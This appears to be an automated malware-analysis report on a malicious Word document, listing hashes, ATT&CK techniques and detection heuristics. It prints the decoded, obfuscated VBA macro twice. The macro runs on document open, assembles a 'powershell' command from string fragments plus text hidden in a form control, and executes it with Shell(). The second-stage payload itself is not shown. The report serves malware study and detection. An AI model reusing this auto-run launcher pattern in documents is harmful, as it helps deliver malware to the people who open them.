Office (OLE) malware analysis — malicious · 77ae62fe8eea41cf

MALICIOUS

Office (OLE)

267.5 KB Created: 2019-02-05 12:39:00 Authoring application: Microsoft Office Word First seen: 2019-05-16

MD5: c07bbadeb3e0e21710918b6aa4dc0659 SHA-1: f225c68b6047c23ec50fc522ef8c4045edf69c9b SHA-256: 77ae62fe8eea41cfd33a6b211ff1eada6c23ff37313a6712c6ea9917487780e9

222 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains VBA macros, including a Document_Open auto-execution macro, which is a common technique for initial execution. The critical heuristic firing for Shell() call in VBA indicates that the macro attempts to execute commands. The script concatenates strings to form the command 'SHELL ow', which is likely intended to download and execute a secondary payload. The ClamAV detection further supports its malicious nature.

Heuristics 6

ClamAV: Doc.Malware.Sagent-6846843-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Sagent-6846843-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://ns.adobe.com/tiff/1.0/In document text (OLE body)
- http://ns.adobe.com/exif/1.0/In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2147 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2147 bytes
SHA-256: `8afbd2e148897d3e2a290a161e2586356b675f88f142d5878bc80f93646ddbbd`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub Document_Open() Dim lEtUSFy(7 To 153) As String lEtUSFy(7) = "a6H2s" Dim iYr4X1Jxt(7 To 153) As String iYr4X1Jxt(7) = "m8N0hM" Dim U5GbeKjrI(14 To 88) As Long U5GbeKjrI(14) = -114 + 238 Dim jTRhfB9iE(1 To 59) As String jTRhfB9iE(1) = "ppKwq" Call w("er") End Sub Attribute VB_Name = "QfAlPia" Sub w(FWtswA) Dim MsmW8h(5 To 232) As String MsmW8h(5) = "WL8SE" Dim nsQV6p nsQV6p = DcoaZzG Dim JJvbWd As Long JJvbWd = (1081 - 1063) / (9) Dim ry86O5Mt(16 To 47) As String ry86O5Mt(16) = "qj0VQ3YA" zWa41Lq2Q = "SHE" & "LL " NAnoNR = "ow" XmL4o8 = FWtswA Dim C7MSyfbz(11 To 39) As Long C7MSyfbz(11) = 21384 / 198 HzoXW DsEqD() & NAnoNR & XmL4o8 & zWa41Lq2Q & K1nCIfmh End Sub Attribute VB_Name = "TL3ADZOM" Public Function DsEqD() As String Dim U5wGQl As Long U5wGQl = (21822 / 7274) / (37) Dim bBxQGcbr As String bBxQGcbr = Awtzg1ucq Dim RBLMn(4 To 99) As Long RBLMn(4) = 267 - 36 Dim sOFwMYkBn(11 To 101) As Long sOFwMYkBn(11) = 15265 / 71 Dim m3CfSx m3CfSx = TvNWcQ8 Dim UOLGe As String UOLGe = t1UXxB DsEqD = "p" End Function Function HzoXW(q372K) HzoXW = Shell(q372K, False) End Function Attribute VB_Name = "MzPONdl" Public Function K1nCIfmh() Dim Mb23Vm5 As Object Set Mb23Vm5 = New f Dim dh5i6 As String Dim MtamZgO1 As Long MtamZgO1 = (1396 - 1389) * (10) dh5i6 = Mb23Vm5.de.Text Dim omYTKHX As String omYTKHX = MXhCE Dim sUqJFPY As Long sUqJFPY = (1065 - 1052) * (13) Dim wQcsJd As Long wQcsJd = (6972 / 249) / (26) K1nCIfmh = dh5i6 End Function Attribute VB_Name = "f" Attribute VB_Base = "0{7EB83F0D-8243-47CE-B7BA-B48F9901F585}{8910233A-51CC-4E9E-AD7B-CD9B7A416385}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False

SHA-256: 8afbd2e148897d3e2a290a161e2586356b675f88f142d5878bc80f93646ddbbd

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub Document_Open()

Dim lEtUSFy(7 To 153) As String
lEtUSFy(7) = "a6H2s"
Dim iYr4X1Jxt(7 To 153) As String
iYr4X1Jxt(7) = "m8N0hM"

Dim U5GbeKjrI(14 To 88) As Long
U5GbeKjrI(14) = -114 + 238
Dim jTRhfB9iE(1 To 59) As String
jTRhfB9iE(1) = "ppKwq"
Call w("er")
End Sub

Attribute VB_Name = "QfAlPia"
Sub w(FWtswA)
Dim MsmW8h(5 To 232) As String
MsmW8h(5) = "WL8SE"
Dim nsQV6p
nsQV6p = DcoaZzG
Dim JJvbWd As Long
JJvbWd = (1081 - 1063) / (9)
Dim ry86O5Mt(16 To 47) As String
ry86O5Mt(16) = "qj0VQ3YA"
zWa41Lq2Q = "SHE" & "LL "
NAnoNR = "ow"
XmL4o8 = FWtswA
Dim C7MSyfbz(11 To 39) As Long
C7MSyfbz(11) = 21384 / 198
HzoXW DsEqD() & NAnoNR & XmL4o8 & zWa41Lq2Q & K1nCIfmh
End Sub

Attribute VB_Name = "TL3ADZOM"
Public Function DsEqD() As String
Dim U5wGQl As Long
U5wGQl = (21822 / 7274) / (37)
Dim bBxQGcbr As String
bBxQGcbr = Awtzg1ucq
Dim RBLMn(4 To 99) As Long
RBLMn(4) = 267 - 36
Dim sOFwMYkBn(11 To 101) As Long
sOFwMYkBn(11) = 15265 / 71
Dim m3CfSx
m3CfSx = TvNWcQ8
Dim UOLGe As String
UOLGe = t1UXxB
DsEqD = "p"
End Function
Function HzoXW(q372K)
HzoXW = Shell(q372K, False)
End Function

Attribute VB_Name = "MzPONdl"
Public Function K1nCIfmh()
Dim Mb23Vm5 As Object
Set Mb23Vm5 = New f
Dim dh5i6 As String
Dim MtamZgO1 As Long
MtamZgO1 = (1396 - 1389) * (10)
dh5i6 = Mb23Vm5.de.Text
Dim omYTKHX As String
omYTKHX = MXhCE
Dim sUqJFPY As Long
sUqJFPY = (1065 - 1052) * (13)
Dim wQcsJd As Long
wQcsJd = (6972 / 249) / (26)
K1nCIfmh = dh5i6
End Function

Attribute VB_Name = "f"
Attribute VB_Base = "0{7EB83F0D-8243-47CE-B7BA-B48F9901F585}{8910233A-51CC-4E9E-AD7B-CD9B7A416385}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Open this report in the interactive analyzer, or submit your own file for analysis.